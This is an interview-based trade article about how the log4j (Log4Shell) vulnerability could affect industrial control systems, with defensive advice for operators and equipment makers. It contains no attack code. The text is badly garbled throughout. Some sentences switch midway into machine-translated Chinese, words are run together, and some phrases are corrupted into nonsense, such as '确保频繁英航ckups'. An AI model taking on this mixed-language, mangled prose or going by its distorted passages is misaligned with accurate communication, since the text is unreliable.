Thelog4j vulnerabilityis a cybersecurity loop-hole that exploits a small, nearly ubiquitous piece of software called log4j, which is used for recording the activities of various computer programs. This logging of events, errors, and routine system operations is performed so that diagnostic messages can be communicated to system administrators and users. However, log4j also allows third-party servers to submit software code which, in the hands of a hacker, could be used to perform malicious actions on a targeted system, such as stealing sensitive information, taking control of a system, or passing malicious content onto other users communicating with the affected server.
Currently, no information has been made available about log4j compromises to any industrial control systems (ICS). Still, because the code is so commonly used, it remains entirely possible. To learn more about how industrial operators can protect their systems,自动化世界spoke with Dennis Hackney, head of industrial cybersecurity services development atABS Group,运营风险管理公司和网络安全咨询服务提供商。
Howthelog4j.VulnerabilityCanAffect an ICSIf a log4j attack occurs, malicious code could be executed on an ICS, granting a threat actor the ability to take control of applications used to view and control physical processes, Hackney says. If an ICS safety system is in place, this loss of control may only result in a temporary system shutdown from which the ICS can be rebooted to an earlier state. However, if no safety system is in place and the software controlling the ICS is compromised, a hacker could gain control. This can occur even if the software on the breached ICS is not controlling a process directly. In a worst-case scenario where an application controls physical processes involving large machinery such as pumps, valves, or tanks that contain hazardous materials or are in close proximity to employees, catastrophic and severe safety risks could result.
根据Hackney的说法,LOG4J违规可能导致几种假设情况:
- 如果历史记者服务器受到损害,则可能被盗的流程趋势或控制系统性能的历史流程数据。
- If a SCADA (supervisory control and data acquisition) server is compromised, threat actors could view or control processes by interpreting the data, making control changes, or modifying sensor readings in a way that goes unnoticed by operators. This could lead to equipment damage, environmental accidents, or even injuries to employees.
- If ransomware were to be installed on an ICS, the entire system could be shut down, forcing operators to either pay a ransom fee or engage in a complete rebuild of their ICS servers and workstations.
如何工业操作离子是ProtectedAgainst Log4j Attacks?Hackney还提供了有关控制系统的最终用户在防止潜在log4j攻击方面更积极主动的几个建议:
- 从互联网和商业网络中识别和隔离任何关键的ICS。
- Develop isolation and manual control workarounds that limit the number of operational impacts that could occur if a vulnerability like log4j is discovered.
- Monitor necessary outgoing connections for cyber threats. Many ICS produce outgoing communications pertaining to maintenance, metering, diagnostics, and more.
- 确保频繁英航ckups are made, and that rigid backup procedures exist. If operators have a stable backup of their ICS, they can guarantee that, should an incident occur, they can bring their systems back online as quickly as possible.
- Update the version of log4j used in your systems. TheNational Institute of Standards National Vulnerability Databasereports that Log4Shell (the name for the log4j vulnerability) has been disabled from log4j 2.15.0 and completely removed from version 2.16.0.
此外,还有ICS供应商和步骤original equipment manufacturers (OEMs) can take, Hackney says. For one, they should announce any log4j vulnerabilities that exist in their products, since end users might not even be aware of them. From there, they should release remediations, mitigations, and patches to help prevent a log4j breach. OEMs can also assist their clients in the discovery of log4j vulnerabilities through the development of specialized support services. Not only would this help end users to protect themselves more easily, but it could also advantage the OEMs by giving their customers access to a premium service that competitors may not be providing. According to Hackney, this service could be provided via a cyber response hotline that customers could call to receive guidance on how best to discover and address vulnerabilities in their ICS. Finally, Hackney recommends that all ICS vendors and OEMs update their design, engineering, and acceptance testing processes to include cybersecurity practices and vulnerability management.
